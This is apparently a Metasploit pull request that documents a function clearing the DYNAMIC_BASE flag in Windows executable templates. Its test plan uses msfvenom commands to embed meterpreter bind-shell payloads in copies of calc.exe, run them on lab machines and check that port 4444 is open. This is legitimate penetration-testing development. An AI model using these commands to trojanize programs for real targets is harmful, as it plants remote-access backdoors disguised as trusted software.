### PR TITLE
See #4366 - Support DYNAMIC_BASE templates for executable payload generation

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -147,6 +147,10 @@ require 'msf/core/exe/segment_injector'
     nil
   end
 
+  # Clears the DYNAMIC_BASE flag for a Windows executable
+  # @param exe [String] The raw executable to be modified by the method
+  # @param pe [Rex::PeParsey::Pe] Use Rex::PeParsey::Pe.new_from_file
+  # @return [String] the modified executable
   def self.clear_dynamic_base(exe, pe)
     c_bits = ("%32d" %pe.hdr.opt.DllCharacteristics.to_s(2)).split('').map { |e| e.to_i }.reverse
     c_bits[6] = 0 # DYNAMIC_BASE


### PR DESCRIPTION
This resolves #4366. Basically **what this patch does is it will clear the DYNAMIC_BASE flag if you're using a Windows template** (either the default one or custom). But please note that when you're using a custom x64 template, using a x64 payload (such as windows/x64/meterpreter/bind_tcp) and your format is "exe", it will not work. Not because it can't clear it, but it's because that combo uses the `exe_sub_method` to generate the executable. That method requires you to have a "PAYLOAD:" string as a tag in the custom template... but who the heck will do this manually? So what ends up happening is when you do "-p [x64 payload] -x [template] -k" in msfvenom, it will just complain about the missing "PAYLOAD". That method needs to be refactored. Instead of the "exe" format, the "exe-only" format will work better for your custom x64 template.
# Setups

Please make sure you have the following setups:
- [x] 32-bit Windows XP
- [x] 32-bit Windows 7
- [x] 64-bit Windows 7
- [x] Make sure the firewall is off for every Windows box (you can turn it off in Control Panel)

And then make sure you have these templates ready:
- [x] Copy calc.exe from the XP box to your template folder. Let's put it in: /tmp/templates/xp_calc.exe
- [x] Copy calc.exe from the 32-bit Win 7 box to your template folder. Let's put it in : /tmp/templates/32_calc.exe
- [x] Copy calc.exe from the 64-bit Win 7 box to your template folder. Let's put it in: /tmp/templates/64_calc.exe
# Testing
## For the XP calc

**Do this test:**
- [x] Do: `./msfvenom -p windows/meterpreter/bind_tcp -x /tmp/templates/xp_calc.exe -f exe > /tmp/fake_xp_calc.exe`
- [x] Copy /tmp/fake_xp_calc.exe to your Windows XP machine
- [x] Double-click on the fake_xp_calc.exe file
- [x] Open a command prompt, and then do: `netstat -an |find "4444"`. You should see port 4444 open.
## For the 32-bit Win 7 calc

**Do this test:**
- [x] Do: `./msfvenom -p windows/meterpreter/bind_tcp -f exe > /tmp/32_default.exe`
- [x] Copy /tmp/32_default.exe to your 32-bit Windows 7 machine
- [x] Double-click 32_default
- [x] Open a command prompt, and then do: `netstat -an |find "4444"`. You should see port 4444 open.

**And do this test:**
- [x] Do: `./msfvenom -p windows/meterpreter/bind_tcp -x /tmp/templates/32_calc.exe -f exe > /tmp/fake_32_calc.exe`
- [x] Copy /tmp/fake_32_calc.exe to your 32-bit Windows 7 machine
- [x] Double-click on the fake_32_calc.exe file
- [x] Open a command prompt, and then do: `netstat -an |find "4444"`. You should see port 4444 open.

**And do this test:**
- [x] Do: `./msfvenom -p windows/meterpreter/bind_tcp -x /tmp/templates/32_calc.exe -f exe-only > /tmp/fake_32_calc_exe_only.exe`
- [x] Copy /tmp/fake_32_calc_exe_only.exe to the same 32-bit Windows 7 machine
- [x] Double-click on the fake_32_calc_exe_only.exe file
- [x] Open a command prompt, and then do: `netstat -an |find "4444"`. You should see port 4444 open.
## For the 64-bit Win 7 calc

**Do this test:**
- [x] Do: `./msfvenom -p windows/x64/meterpreter/bind_tcp -f exe-only > /tmp/64_default.exe`
- [x] Copy /tmp/64_default.exe to your 64-bit Win 7 machine
- [x] Open a command prompt, and then do: `netstat -an |find "4444"`. You should see port 4444 open.

**And then do this test:**
- [x] Do: `./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe`
- [x] Copy /tmp/fake_64_calc.exe to your 64-bit Windows 7 machine
- [x] Double-click fake_64_calc.exe
- [x] Open a command prompt, and then do: `netstat -an |find "4444"`. You should see port 4444 open.
# Final step
- [x] Congratulations, you actually went through all the steps. Have a cookie:

![cookie](https://cloud.githubusercontent.com/assets/1170914/5408609/afed78b6-81a3-11e4-995c-b98e70f4bdb9.jpg)
